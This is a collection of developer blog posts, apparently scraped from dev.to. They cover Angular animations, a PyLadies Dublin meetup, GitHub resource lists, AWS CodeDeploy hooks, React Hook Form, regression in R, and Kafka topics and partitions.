Now we’re ready to add our Angular animations! But where? We’ll approach this in the simplest manner. But be aware that we’re just scratching the surface of the power of Angular animation. It’s worth learning much more about. The simple approach is directly in the affected component. In our case, that’s `app.component.ts's` `@Component` directive. Here is the whole thing, but don’t worry, we’ll break it down and explain it.
```
import { trigger, state, style, animate, transition } from '@angular/animations';
@Component({
...,
animations: [
trigger(
'inOutAnimation',
[
transition(
':enter',
[
style({ height: 0, opacity: 0 }),
animate('1s ease-out',
style({ height: 300, opacity: 1 }))
]
),
transition(
':leave',
[
style({ height: 300, opacity: 1 }),
animate('1s ease-in',
style({ height: 0, opacity: 0 }))
]
)
]
)
]
})
```
Whew! That’s a lot and it’s not terribly obvious without reading through it carefully. Let’s break it down, bit by bit.
First, `animations: []` is an array of things we want to happen or state definitions. In this case we just want to `trigger` an animation called `inOutAnimation`. You can name this what you like. It should be descriptive for what it accomplishes or what it should consistently apply to. In our case we are animating an image in and out of the view.
Then, we give the `trigger` a set of states and/or transitions. We only need two specific transitions to occur that are related to `*ngIf`: `:enter` and `:leave`. These are the states that CSS just doesn’t give us. `:enter` is when a DOM element is being added, and `:leave` is when a DOM element is being removed.
When we want the image to `:enter` we are starting with the style of `height: 0, opacity: 0`. It’s basically invisible to start with. When it’s done we would like it to be 300 pixels tall and be completely opaque.
This is where the `animate` instruction comes in. We are going to animate over 1) a period of time 2) with a particular easing mechanism 3) to a new style. 1 and 2 are combined in the first string-based instruction, `0.3s ease-out`. This means that we are animating to the new style over 0.3 seconds, and we are easing out, or coming to a gentle stop rather than a sudden one. 3 specifies what the end styling should be. In our case that’s 300 pixels high and completely opaque.
If you run this now you’ll find that nothing has changed. We now need to apply the animation to the element that is being added/removed from the DOM. In this case, it’s our `<img>` tag that has the `*ngIf` directive on it.
```
<img
*ngIf="showImage"
[@inOutAnimation]
width="300"
alt="Angular Logo"
src="..."
/>
```
Here we use the name of the trigger to bind the animation to the template element.
If you run it now, you can click the button and the image zoom/fades in. Click it again and it’ll shrink/fade out! Voila!
Personally, I find the syntax of Angular animations somewhat difficult. It’s non-obvious and, if you’re not doing it every day, you’re probably going to have to re-learn this a few times. And the template syntax works with or without the `[]`'s, which makes me scratch my head a bit.
Maybe the Angular team will give us a ReactiveAnimationsModule someday that makes animation a bit easier to work with, like ReactiveFormsModule did for forms? One can hope.
This is just scratching the surface of what Angular animations are capable of. Very complex transforms/transitions are possible and can be carefully coordinated in ways that CSS just can’t guarantee.
As a side note, if you’re worried about performance vs pure CSS animations, this is a quote from the [Angular docs](https://angular.io/guide/animations):
> _Angular’s animation system lets you build animations that run with the same kind of native performance found in pure CSS animations. You can also tightly integrate your animation logic with the rest of your application code, for ease of control._
If you’ve found this useful, I’d appreciate a few claps for this article.
If you’d like to learn more about Angular in a fun environment while hanging out with the movers and shakers of the Angular world, snag a ticket to [ng-conf](https://www.2021.ng-conf.org/) and join us for the best Angular conference in the US.
Image by [PIRO4D](https://pixabay.com/users/piro4d-2707530/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2137333) from [Pixabay](https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2137333).
For more Angular goodness, be sure to check out the latest episode of [The Angular Show podcast](https://www.spreaker.com/show/angular-show).
---
## ng-conf: Join us for the Reliable Web Summit
Come learn from community members and leaders the best ways to build reliable web applications, write quality code, choose scalable architectures, and create effective automated tests. Powered by ng-conf, join us for the Reliable Web Summit this August 26th & 27th, 2021.
https://reliablewebsummit.com/ | ngconf |
739,406 | PyLadies Dublin: Shipping Python Apps using Podman / Collaborative documentation as code with Git, Mkdocs and Pandoc | ❤️ A huge thank you for all those who attended and interested in our recent PyLadies Dublin meetup as... | 11,521 | 2021-06-28T20:26:50 | https://dev.to/pyladiesdub/pyladies-dublin-shipping-python-apps-using-podman-collaborative-documentation-as-code-with-git-mkdocs-and-pandoc-4h34 | pyladies, python, video | ❤️ A huge thank you for all those who attended and interested in our recent PyLadies Dublin meetup as well as being patient as the audio technical difficulties at the start of one of our speakers talk (it was a problem at my end 😅).
🍿 Alternatively you missed it or want to re-watch it (I've added chapters): https://www.youtube.com/watch?v=UwHiZ6yhMZU
👏 To Elfin and Mihai for speaking and helping us out at such short notice, and this would not have happened if my co-organiser Lei hadn't reached out for speakers for me. Thank you all so much, and not forgetting Mick who ran up 2 flight of stairs to see what was going on with my audio. 😆
🙌 But it all worked out in the end, even with gremlins running amuck but we kept rolling and all's well that ends well, wrapping up with Elfin coming back to explain how she solved an earlier issue when doing live demos! Yes, it was all live demos at this meetup! It was all very amazing!
📢 Announcements from the evening can be found here: https://cryptpad.fr/pad/#/2/pad/view/jn-9KLn4c0Zhy+CyC4z8mUdRTpKs8ChoEz7zo31YITY/
🗓 Next PyLadies Dublin

* Jul 20, 18:30 - 19:30 (Irish Time)
Bojan Miletic talking about "FastAPI, Lambdas, PyTest and other cool things"
* We've got room for **1** more lightning talk speaker (10-15mins)
* RSVP and details here: https://www.meetup.com/PyLadiesDublin/events/277651743/
📢 Call for Speakers (from Sep onwards)
* Interested in speaking or know someone who has something awesome to show at our upcoming meetups, send them on via https://pyladiesdublin.typeform.com/to/VvW3iME6
🤔 If you have ideas for talks, workshops, something we haven't done before, or general questions of any kind, drop us an email at dublin@pyladies.com.
Again, I would like to thank everyone for your interest and attending our live-streams, please like and subscribe to [our Youtube channel](https://www.youtube.com/channel/UCMunGHeQPceOWhNSqlmYWPg) and hit that 🔔 to know when our next one goes live. Your support is much appreciated. If you missed the live-stream, don't worry, it's in [our playlist](https://www.youtube.com/playlist?list=PL13GO9yDtCL1QEVuqAVldK2JqGof9wsuk) so you can watch it in your own time (or re-watch it).
---
## TALK 1: Shipping Python Apps using Podman by Elif Mosessohn-Samedin
### Description:
A quick introduction to Ansible and Red Hat Container Tools for Pythonistas. Building and running Python applications using Podman. Exploring the manner containers benefit developers.
### About Elif Mosessohn-Samedin
DevOps (Automation) Engineer with experience in Infrastructure Optimization and Management. Red Hat Certified Architect in Infrastructure. Advocate for Continuous Learning, Open Source Communities, and Technical Innovation. Espresso Addict. https://github.com/elifsamedin
## TALK 2: Collaborative documentation as code with Git, Mkdocs and Pandoc by Mihai Criveti
### Description:
Authoring documentation, presentations and blogs with multiple collaborators using an open framework and CI/CD.
Understanding mkdocs and pandoc. Authoring presentations using markdown, LaTeX and pandoc.
Setting up Git for multiple authors, with CODEOWNERS and pull requests.
Using make, GitHub, TravisCI to automate the publishing process.
Containerized doc builds with pandoc and kubernetes.
### About Mihai Criveti
Mihai Criveti is the CTO for Cloud Native and Red Hat Solutions at IBM, and a Red Hat Certified Architect, supporting clients with Open Source technologies. https://github.com/crivetimihai
---
# 🕰 SCHEDULE
18:30 - 18:35 Event Starts / Settle down with cup of tea/coffee
18:35 - 18:45 Welcome & Announcements by Vicky
18:45 - 19:00 Shipping Python Apps using Podman by Elif Mosessohn-Samedin
19:00 - 19:15 Collaborative documentation as code with Git, Mkdocs and Pandoc by Mihai Criveti
19:15 - 19:30 Q&A
19:25 - 19:30 Anything else to wrap up with from anyone in audience?
19:30 Event ends
---
# 📢 CALL FOR SPEAKERS for 2021
Interested in speaking at our upcoming meetups, please submit talk details to: https://pyladiesdublin.typeform.com/to/VvW3iME6
If you have referrals of speakers you want us to invite, let us know also, being a virtual event helps close the boundaries of inviting speakers further afield than Ireland. 😊
# CONTACT US
💌 Email: dublin@pyladies.com.

# 🤔 FAQ
## Q. I'm not female, is it ok for me to attend?
A. Yes, PyLadies Dublin events are open to everyone at all levels.
## Q. What do you do at PyLadies Dublin Meetups?
A. We have short (or long talks), demos, folks working on their own projects, ask questions on Python-related topics, work on projects together or generally chit-chat and meet like-minded people.
## Q. Do you have a Code of Conduct?
A. Yes, you can find it at https://dublin.pyladies.com
| whykay |
739,417 | 35 Must Known GitHub Repositories For Developers | GitHub is a git hosting platform service. There is not a single thing that you can’t find on GitHub... | 0 | 2021-06-25T17:57:57 | https://dev.to/abhayparashar31/35-must-known-github-repositories-for-developers-2hi7 | github, programming, python, java | GitHub is a git hosting platform service. There is not a single thing that you can’t find on GitHub related to the software industry. It is a goldmine of resources for developers. Like every other mine in the world, you need to be a good miner to dig gold to get great resources from it.
If you are not in the mood to do a lot of research, don’t worry I am here for you. In this blog, we are going to see some of the best GitHub repositories for developers that you should bookmark right away.
## 1. The Algorithm
It is one of the best GitHub repositories for learning data structures and algorithms using different languages. Data Structures must be known for every computer science student. Whether you are a python developer, Java developer, Go developer, or some old-school C++ developer, there is something for everyone in this repository that you should learn. All the algorithms and data structures present here are explained very easily. They also have a website for easy access to all the code.
**Stats : (111k+ ⭐) (30.4k+ Forked)**
## 2. freeCodeCamp/freeCodeCamp
Freecodecamp is a nonprofit organization that provides a free learning platform for learning to code. Their Github repository is the backend for everything. In the repo, there is a README.md file that contains the links to each course available on the website. The Github Profile of FreeCodeCamp also contains many other useful repositories like boilerplates for different programming languages, how to contribute to open source, and many more.
**Stats : (325k+ ⭐) (26k+ Forked)**
## 3. EbookFoundation/free-programming-books
This repository is another GEM of Github. The repository provided by EbookFoundation contains a list of free programming books. You will find links to free books in 20+ languages. There are Over a thousand books that are covering over 100 programming languages and millions of concepts.
**Stats : (194k+ ⭐) (43k+ Forked)**
## 4. Avik-Jain/100-Days-Of-ML-Code
This repository is more than a repo, it shows the constant hard work and dedication of a group of people to contribute to open source. As the name of the repository suggests, it has a 100-day curriculum to learn Machine Learning. One of the best parts of this repo is the attractive banner images for every day. If you are a learner or a developer of ML this one is a must be forked for you.
**Stats : (32.4k+ ⭐) (8.2k+ Forked)**
## 5. tuvtran/project-based-learning
One of the best ways to learn to code is by building projects because in the end, all that matters is the number of projects and knowledge you have. Many companies are giving priority to projects more than certificates.
This repo has a collection of links to different projects on the internet to help you boost your learning in different areas of programming. Whether it is web development, Game Development, JavaScript, or Python you will find a project for everything.
**Stats : (51.4k+ ⭐) (8k+ Forked)**
**Check Out Other 30 Valuable Repositories [here](https://levelup.gitconnected.com/35-most-valuable-github-repositories-for-developers-45ab9df1af81)**
| abhayparashar31 |
741,102 | AWS CodeCommit LifeCycle Hooks run order, summarized in one table for EC2, ECS, Lambda | While preparing for my AWS DevOps Engineer Professional exam I had to understand and memorize the... | 0 | 2021-06-28T08:33:35 | https://dev.to/vgcloud/aws-codecommit-lifecycle-hooks-run-order-summarized-in-one-table-for-ec2-ecs-lambda-mh6 | aws, linux, serverless, devop | While preparing for my AWS DevOps Engineer Professional exam I had to understand and memorize the CodeDeploy LifeCycle hooks. As usual, AWS provides decent documentation. Here is an example about how the [Run order of hooks](https://docs.aws.amazon.com/codedeploy/latest/userguide/reference-appspec-file-structure-hooks.html) is documented. However, I could not find a table with all three cased combined. So I created one and it did help me a lot during the study. And also, I had a question in the exam about the "AfterAllowTestTraffic" hook.
### Table 1: Run order of hooks for Lambda, ECS and EC2 Blue-Green deployments

*Note 1: The greyed out hooks in the table are reserved for CodeDeploy operations. They cannot be used to run scripts.*
*Note 2: Hooks on EC2 can be used to run scripts on instances, while hooks for Lambda and ECS can be used only to run Lambda functions.*
### Table 2: Run order of hooks for EC2 In-Place deployments without ELB and with ELB and EC2 Blue-Green deployments

Happy coding CodeDeploy lifecycle hooks! | vgcloud |
739,435 | Machine Learning Applications: Stroke Prediction | The Stroke Prediction Dataset at Kaggle is an example of how to use Machine Learning for disease... | 0 | 2021-06-25T18:51:15 | https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/ | article | ---
title: Machine Learning Applications: Stroke Prediction
published: true
date: 2021-06-25 14:35:53 UTC
tags: Article
canonical_url: https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/
---
The Stroke Prediction Dataset at Kaggle is an example of how to use Machine Learning for disease prediction.
The dataset comprises more than 5,000 observations of 12 attributes representing patients’ clinical conditions like heart disease, hypertension, glucose, smoking, etc.
For each instance, there’s also a binary target variable indicating if a patient had a stroke.
We can build a … [Continue reading Machine Learning Applications: Stroke Prediction →](https://reinforcement-learning4.fun/2021/06/25/machine-learning-applications-stroke-prediction/) | rodolfomendes |
739,453 | React Hook Form | React hook form is a tiny library without any other dependencies. It is easy to use which requires us... | 0 | 2021-07-08T14:09:35 | https://dev.to/maimohamed/react-hook-form-4hk6 | javascript, react | React hook form is a tiny library without any other dependencies. It is easy to use which requires us to write fewer lines of code compared to other libraries.
##1. Why Not Other React Library Forms?
* Performance is important. This is a tiny library without any dependencies.
* Reduces the code to handle forms, with less complexity due to the Hooks.
* Minimizes the number of re-renders and faster mount.
##2. Installation
It's the time to make our forms powerful with the use of React Hook Forms! Open your terminal and then execute the following commands which makes a new React project:
`npx create-react-app react-hook-form-demo `
`cd react-hook-form-demo`
`npm install react-hook-form`
`npm start`
At the end of the article we will be able to create a simple registration form like this
{% codesandbox amazing-kalam-vzwod%}
let's start
##3. Basic form
<mark>
Assume that we have a simple form with a user name input field and logs the data on console after submission
</mark>
```javascript
const App=()=> {
return (
<form>
<input type="text" placeholder="user name"/>
<button type="submit">submit</button>
</form>
);
}
export default App;
```
Time to import react hook form
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const { register, handleSubmit } = useForm();
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input type="text" placeholder="user name" {...register("userName")} />
<button type="submit">submit</button>
</form>
);
};
export default App;
```
After submittion we got the consoled data but what are those new words (useForm , register )
Before we move ahead we need to know how this library works,
<h4> useForm </h4>It is custom hook for managing forms.
This is one of those functions which you will be calling first before you apply any handling logic to your existing forms. It returns an object containing some properties. For now, you only need register and handleSubmit
<h4>register</h4> Allows you to register an input ref and apply validation rules into React Hook Form.
<h4>handleSubmit</h4>This function will received the form data if form validation is successful.
##4.Adding default values (initial values)
It is common to initialize a form by passing defaultValues to useForm.
```javascript
const { register, handleSubmit } = useForm({
defaultValues: {
userName: "Mai",
}
});
```
##5. Basic validation
<mark>
Assume that we need to validate this user name input to be a required field and must be at least 3 characters
</mark>
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const {
register,
handleSubmit,
formState: { errors },
} = useForm({ mode: "onChange" });
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input
type="text"
placeholder="user name"
{...register("userName", {
required: true,
minLength: {
value: 3,
},
})}
/>
{errors.userName?.type === "required" && (
<small>user name is required</small>
)}
{errors.userName?.type === "minLength" && (
<small>user name must be atleast 3</small>
)}
<button type="submit">submit</button>
</form>
);
};
export default App;
```
React Hook Form provides an errors object to show you the errors in the form.
##5. Adding nested fields
<mark>
Assume that user should enter his address throw two nested fields (country , city)
</mark>
the final view should be like this
```json
{userName:"toty",
address:{country:"x",city:"y"}
}
```
```javascript
import { useForm } from "react-hook-form";
const App = () => {
const {
register,
handleSubmit,
formState: { errors },
} = useForm({ mode: "onChange" });
const onSubmit = (data) => console.log(data);
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input
type="text"
placeholder="user name"
{...register("userName", {
required: true,
minLength: {
value: 3,
},
})}
/>
{errors.userName?.type === "required" && (
<small>user name is required</small>
)}
{errors.userName?.type === "minLength" && (
<small>user name must be atleast 3</small>
)}
<input
type="text"
placeholder="country"
{...register("address.country", {
required: true,
})}
/>
<input
type="text"
placeholder="city"
{...register("address.city", {
required: true,
})}
/>
<button type="submit">submit</button>
</form>
);
};
export default App;
```
Wooow It is soo easy !!
[logo]: https://static.wikia.nocookie.net/spongebob/images/a/ac/Hooky_078.png/revision/latest/scale-to-width-down/1000?cb=20190906081347 "Logo Title Text 2"
![alt text][logo]
But the code is little long so let's make a small refactor for moving the input to be a shared component and also using react bootstrap
##6. Integration with react bootstrap
```javascript
import { Form } from "react-bootstrap";
const Input = ({
label,
type,
placeholder,
controls,
errorMsg,
disabled,
}) => {
return (
<div className="mb-3">
{label && <Form.Label>
{label}</Form.Label>}
<Form.Control
{...controls}
type={type}
placeholder={placeholder}
disabled={disabled}
/>
{errorMsg && <small>
{errorMsg}</small>}
</div>
);
};
export default Input;
```
and the main component after refactoring should be like this
```javascript
<Input
label="User Name"
type="text"
placeholder="enter your user name"
controls={register("userName", {
required: true,
minLength: {
value: 3,
},
})}
errorMsg={
errors.userName?.type === "required" &&
"user name is required"
}
/>
```
##7. Integration with third party libraries
Assume that our third party library is React select
`npm install react-select`
first we need to add a shared component for react select
```javascript
import React from "react";
import Select from "react-select";
import { Controller } from "react-hook-form";
const InputSelect = ({
options,
label,
control,
controls,
name,
errorMsg,
placeholder,
asterick,
}) => {
return (
<>
<label>
{label} {asterick && <span>*</span>}
</label>
<Controller
name={name}
isClearable
control={control}
{...controls}
render={({ field }) => (
<Select
{...field}
options={options}
placeholder={placeholder}
/>
)}
/>
{errorMsg && <small>{errorMsg}</small>}
</>
);
};
export default InputSelect;
```
But what `Controller` means
It is a wrapper component from react hook form that makes it easier for you to work with third party libraries.
and now we can use this select in our main component like this
```javascript
const genderOptions = [
{ value: "male", label: "Male" },
{ value: "female", label: "Female" },
];
```
```javascript
<InputSelect
control={control}
options={genderOptions}
placeholder="Gender"
asterick={true}
label="Gender"
name="gender"
controls={register("gender", {
required: true,
})}
errorMsg={
errors?.gender?.type === "required" &&
"gender is required"
}
/>
```
stay tuned for the next article to complete our journey in react hook forms
and don't forget your feed back.
| maimohamed |
739,630 | correlation and Regression using R programming | How do I calculate correlation using R programming?? To calculate correlation between two... | 0 | 2021-06-26T00:32:25 | https://dev.to/maxwizard01/correlation-and-regression-using-r-programming-50ea | tutorial, datascience, newbie, devops | ## How do I calculate correlation using R programming??
To calculate correlation between two data sets is quite easy all you need is to make use of cor() function and insert the parameters `x`and `y`.
### Example1
What is the correlation between X and Y if y = (100,94,150,160,180), and x = (23,21,32,40,45).
### Solution
#### Codes>>
```R
y=c(100,94,150,160,180)
x =c(23,21,32,40,45)
cor(x,y)
```
#### Result>>
```
> y=c(100,94,150,160,180)
> x =c(23,21,32,40,45)
> cor(x,y)
[1] 0.978522
```
### Example2
What is the correlation between X and Y if y =(100,94,150,160,180,80), and x = (23,21,32,40,45, 10).
### Solution
####Codes>>
```R
y=c(100,94,150,160,180,80)
x =c(23,21,32,40,45, 10)
cor(x,y)
```
#### Result>>
```
> y=c(100,94,150,160,180,80)
> x =c(23,21,32,40,45, 10)
> cor(x,y)
[1] 0.972529
```
### How to calculate the regression
To deal with regression there are two values very important they are : the beta and the alpha. they are used to form the equation that connect the two items.
i.e y=bx + a. where a and b represent the alpha and beta respectively.
note: alpha is the intercept why b is the slope.
### How do I calculate the beta and alpha of regression using R programming.
To calculate your alpha and beta using code we make use of `lm()` function.
where the parameters are place inside the lm() functions. let's take a look at some examples
#### Example1
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80]. Obtain the linear model of the relationship between y and x.
Solution
#### Codes>>
```R
y=c(100,94,150,160,180,80)
x =c(23,21,32,40,45, 10)
lm(y ~ x)
```
#### Result>>
```
> y=c(100,94,150,160,180,80)
> x =c(23,21,32,40,45, 10)
> lm(y ~ x)
Call:
lm(formula = y ~ x)
Coefficients:
(Intercept) x
39.693 3.075
```
*Conclusion*: from the result above alpha =39.693 while Beta=3.075.
and the equation is Y=3.075x+39.693
#### Example2
If x = [23,21,32,40,45] and y = [100,94,150,160,180]. Obtain the linear model of the relationship between y and x.
#### Solution
##### Codes>>
```R
y=c(100,94,150,160,180)
x =c(23,21,32,40,45)
lm(y ~ x)
```
##### Result>>
```
> y=c(100,94,150,160,180)
> x =c(23,21,32,40,45)
> lm(y ~ x)
Call:
lm(formula = y ~ x)
Coefficients:
(Intercept) x
22.071 3.563
```
Conclusion: from the result above alpha =22.071 while Betaa=3.563.
and the equation is Y=3.563x+22.071.
#### Example3
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80]. What would be the value of y if x = 20.
#### Solution.
Note the we already write codes for this item in Example1. and our equation is Y=3.075x+39.693. so let's find the value of y when x=20.
##### codes>>
```R
x=20
Y=3.075*x+39.693
print(Y)
```
#### Result>>
```
> x=20
> Y=3.075*x+39.693
> print(Y)
[1] 101.193
```
### Example4
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80]. What would be the value of x if y = 200
#### Solution.
Note the we already write codes for this item in Example1. and our equation is Y=3.075x+39.693. since we need to find x when y=200 therefore we have to make x the subject of the formula.
Working that out we get x=(Y-39.693)/3.075. Now let's write the codes.
#### Codes>>
```R
Y=200
x=(Y-39.693)/3.075
print(x)
```
#### Result>>>
```
> Y=200
> x=(Y-39.693)/3.075
> print(x)
[1] 52.13236
```
Yeah. that is how easy it is to use codes to solve most of the problem relating with correletion and regressions. I hope you find this article helpful? Alright you can chat me up if you have any doubt or observation on `07045225718` or `09153036869` it is still your guy Maxwizard. Enjoy coding! | maxwizard01 |
739,705 | Notes on Kafka: Topics, Partitions, and Offset | In the previous section, we have installed the Kafka and all the required pre-requisites in our... | 13,252 | 2021-06-26T00:59:41 | https://dev.to/jeden/notes-on-kafka-topics-partitions-and-offset-3fgg | kafka, microservices, devops, 100daysofcode | In the previous section, we have installed the Kafka and all the required pre-requisites in our machine. You can skip some part of this section that you're already familiar with, but basically we'll be going over:
- [Brief walkthrough of the directories](#brief-walkthrough-of-the-directories)
- [Now, onto the main topic](#now-onto-the-main-topic)
- [What's in a message?](#whats-in-a-message)
- [Event Sourcing](#event-sourcing)
- [Partitions](#partitions)
- [The Message Offset](#the-message-offset)
- [The Message Retention Policy](#the-message-retention-policy)
- [As a Distributed Commit Log](#as-a-distributed-commit-log)
---
## Brief walkthrough of the directories
Recall that we've created the Kafka files directory in <code>/usr/local/bin</code> and copied the extracted contents of the Kafka tarball we downloaded. Note that Kafka the files directory or the Kafka program can be ran from any directory you prefer.
```bash
root:kafka_2.13-2.7.0 $ ls -l
total 56
drwxr-xr-x 3 root root 4096 Dec 16 2020 bin
drwxr-xr-x 2 root root 4096 Jun 23 15:05 config
drwxr-xr-x 4 root root 36 Jun 23 15:05 data
drwxr-xr-x 2 root root 8192 Jun 23 15:05 libs
-rw-r--r-- 1 root root 29975 Dec 16 2020 LICENSE
-rw-r--r-- 1 root root 337 Dec 16 2020 NOTICE
drwxr-xr-x 2 root root 44 Dec 16 2020 site-docs
```
The **site-docs** contains an archive of all the documentation that's available online.
The **libs** folder contains on the dependencies needed by Kafka to run.
You'll notice at bottom section that there's an archive for **zookeeper** and its client library. Kafka can be a self-contained installation and does not require ZooKeeper to be pre-installed.
```bash
# Please note that some of the contents are omitted to shorten output
root:kafka_2.13-2.7.0 $ ls -l libs/
total 67052
-rw-r--r-- 1 root root 69409 May 28 2020 activation-1.1.1.jar
-rw-r--r-- 1 root root 27006 Jun 30 2020 aopalliance-repackaged-2.6.1.jar
-rw-r--r-- 1 root root 90347 May 28 2020 argparse4j-0.7.0.jar
-rw-r--r-- 1 root root 20437 Dec 20 2019 audience-annotations-0.5.0.jar
-rw-r--r-- 1 root root 53820 Dec 20 2019 commons-cli-1.4.jar
-rw-r--r-- 1 root root 501879 May 28 2020 commons-lang3-3.8.1.jar
-rw-r--r-- 1 root root 12211 Jan 22 2020 slf4j-log4j12-1.7.30.jar
-rw-r--r-- 1 root root 1945847 Oct 21 2020 snappy-java-1.1.7.7.jar
-rw-r--r-- 1 root root 991098 May 27 2020 zookeeper-3.5.8.jar
-rw-r--r-- 1 root root 250547 May 27 2020 zookeeper-jute-3.5.8.jar
-rw-r--r-- 1 root root 5355050 Aug 12 2020 zstd-jni-1.4.5-6.jar
```
The **config** contains all the configuration files for Kafka. Here you can see **server.properties**. This is the configuration file for the Kafka broker.
```bash
root:kafka_2.13-2.7.0 $ ll config/
total 72
-rw-r--r-- 1 root root 906 Dec 16 2020 connect-console-sink.properties
-rw-r--r-- 1 root root 909 Dec 16 2020 connect-console-source.properties
-rw-r--r-- 1 root root 5321 Dec 16 2020 connect-distributed.properties
-rw-r--r-- 1 root root 883 Dec 16 2020 connect-file-sink.properties
-rw-r--r-- 1 root root 881 Dec 16 2020 connect-file-source.properties
-rw-r--r-- 1 root root 2247 Dec 16 2020 connect-log4j.properties
-rw-r--r-- 1 root root 2540 Dec 16 2020 connect-mirror-maker.properties
-rw-r--r-- 1 root root 2262 Dec 16 2020 connect-standalone.properties
-rw-r--r-- 1 root root 1221 Dec 16 2020 consumer.properties
-rw-r--r-- 1 root root 4674 Dec 16 2020 log4j.properties
-rw-r--r-- 1 root root 1925 Dec 16 2020 producer.properties
-rw-r--r-- 1 root root 6876 Jun 23 15:05 server.properties
-rw-r--r-- 1 root root 1032 Dec 16 2020 tools-log4j.properties
-rw-r--r-- 1 root root 1169 Dec 16 2020 trogdor.conf
-rw-r--r-- 1 root root 1237 Jun 23 15:05 zookeeper.properties
```
Lastly, the **bin** contains all the programs you cna execute to get Kafka up and running.
```bash
# Please note that some of the contents are omitted to shorten output
root:kafka_2.13-2.7.0 $ ll bin/
total 144
-rwxr-xr-x 1 root root 1423 Dec 16 2020 connect-distributed.sh
-rwxr-xr-x 1 root root 1396 Dec 16 2020 connect-mirror-maker.sh
-rwxr-xr-x 1 root root 1420 Dec 16 2020 connect-standalone.sh
-rwxr-xr-x 1 root root 861 Dec 16 2020 kafka-acls.sh
-rwxr-xr-x 1 root root 958 Dec 16 2020 kafka-verifiable-producer.sh
-rwxr-xr-x 1 root root 1714 Dec 16 2020 trogdor.sh
drwxr-xr-x 2 root root 4096 Dec 16 2020 windows
-rwxr-xr-x 1 root root 867 Dec 16 2020 zookeeper-security-migration.sh
-rwxr-xr-x 1 root root 1393 Dec 16 2020 zookeeper-server-start.sh
-rwxr-xr-x 1 root root 1366 Dec 16 2020 zookeeper-server-stop.sh
-rwxr-xr-x 1 root root 1019 Dec 16 2020 zookeeper-shell.sh
```
---------
## Now, onto the main "Topic"

**Topics** are simply logical collections of messages that can virtually span across the entire clusters.
- it is a named feed - addressable and can be referenced
- Producers send messages to a topic
- Consumers retrieve messaged from a topic
- you can have as many topics as you want
- topics are split into **partitions**
Producers and consumers don't really care how or where the messages are kept. On the Kafka cluster's side, one or more log files are maintained for each topic.
---------
## What's in a message?

Every Kafka message will have:
- **a timestamp**- set when messaged is received by the broker
- **unique identifier** - a way for consumers to reference the message
- **binary payload** - data
Recall that Kafka was conceived to resolve the issue of making consumption available to a theoretically unlimited number of independent and autonomous consumers. This means that there could be not just one consumer but hundreds or thousands of consumers that would like to receive the same messages.
Now why is this important to know? If one consumer processed a message erroneously, that fault should not cascade or impact other consumers that are processing the same message.
A single crash in one consumer shouldn't keep others from operating. Each must have its own exclusive boundary
---
## Event Sourcing
When a producer sends a message to a topic, the messages are **appended in a time-ordered sequential stream.**
- Each message represents an **event** or **Fact**
- Events are intended by the producers to be consumed by the consumers
- Events are also **immutable** - can't be modified once receive by the topic
- If an event in the topic is **no longer valid**, the producer should follow-up it up with newer, correct one
- The consumer would have to reconcile messages when processed

These architectural style of maintaining an application's state through the changes captured in the immutable, time-ordered sequence is called **Event Sourcing**.
---------
## Partitions

As mentioned, topics can have 1 or more partitions
- number of partitions is configurable
- each partition is ordered
- each message in a partition gets an incremental id called **offset**
- order of message is only guaranteed within a partition, not across partitions
- essential for scalability and fault-tolerance
**Do I need to specify a partition when I create a topic?**
Yes, we need to specify the partition when we create a topic but this can be changed any time.
**Should I use a single partition or multiple partitions?**
A single-partition topic can be used even for production, but this limits scalability and throughput. This is because you cannot simply split a single partition across multiple machines. A single partition may not be able to sustain a growing topic.
**For multiple partitions, can I select the partition where the message will go to?**
Data is randomly assigned to a partition unless a key is specified. This will be discussed in the succeeding chapters.

---------
## The Message Offset
The message offset enables consumers to read their messages at their own pace, and process them independently. Similar to a bookmark,
- serves as a message identifier
- maintains last read message position
- tracked and maintained by Consumer
At the beginning, a consumer will establish a connection to a broker. The consumer will then decide what messages it want to consume. There could be two instances here:
- the consumer has not read any message from the topic yet
- the consumer has read from topic but wants to re-read a message
In both cases, the consumer will read from the beginning. It will then set its message offset to zero, indicating it's at the start. As it reads through the sequence of message, it will also move it's message offset.

Let's say we have another consumer that is also reading the messages and is at a different place in the topic. It can choose to stay in that place, reread the messages from the start, or proceed with the remaining messages.
When newer messages arrive at the topic, the connected consumers will receive an event indicating the published messages and both consumer can decide to retrieve and process the new messages.

The idea here is, **the consumer knows where it is currently at and it can choose to start over or advance its position, without the need to inform the brokers, producers or other consumers.**
Another thing to note here is **offset is specific for each partition**. This means that offset 3 in partition O will not have the same data as offset 5 in partition 6.
---
## The Message Retention Policy

One of the challenges that most messaging system face are **slow consumers**. The problem with slow consumers is that the queue can get long and some messages might get lost.
Kafka's solution to this is its **message retention policy.** This allows Kafka to store the messages for a configurable period of time (hours).
- published messages are retained regardless if it's been consumed or not
- **default retention time:** 168 hours or 7 days
- after that time has passed, messages will be removed
- the cluster will start removing the oldest messages
- retention period is set **per-topic**
- message retention may be **constrained** by physical storage
-----
## As a Distributed Commit Log

Before we conclude this section about topics and partition, we'll look at Kafka's basis in building its architecture - **commit logs.**. A database's transaction or commit log is:
- **source of truth** - a primary record of changes
- appends events in the order they're received
- logs are then read from left to right - in a chronological order
- log entries are stored in physical log files and maintained by database
- higher-order derivative structures can be formed to represent the log
- tables, indexes, views (relaional databases)
- serves as **point-in-time recovery** during crashes
- basis for **replication** and **distribution**
In summary, Kafka can be thinked of as an external commit log for a distributed system which uses publish-subscribe semantics for brokers to read and write.
---------
If you've enjoyed this short but concise article, I'll be glad to connect with you on [Twitter!](https://twitter.com/eden_noel08). 😃
{% user jeden %}
---------------------------------
| jeden |
739,771 | Technician Pabx Jakarta | Service Pabx – Teknisi Service Pabx menyediakan Jasa Layanan Pemeliharaan dan perbaikan Pabx, untuk... | 0 | 2021-06-26T04:44:07 | https://dev.to/jono76/technician-pabx-jakarta-492f |
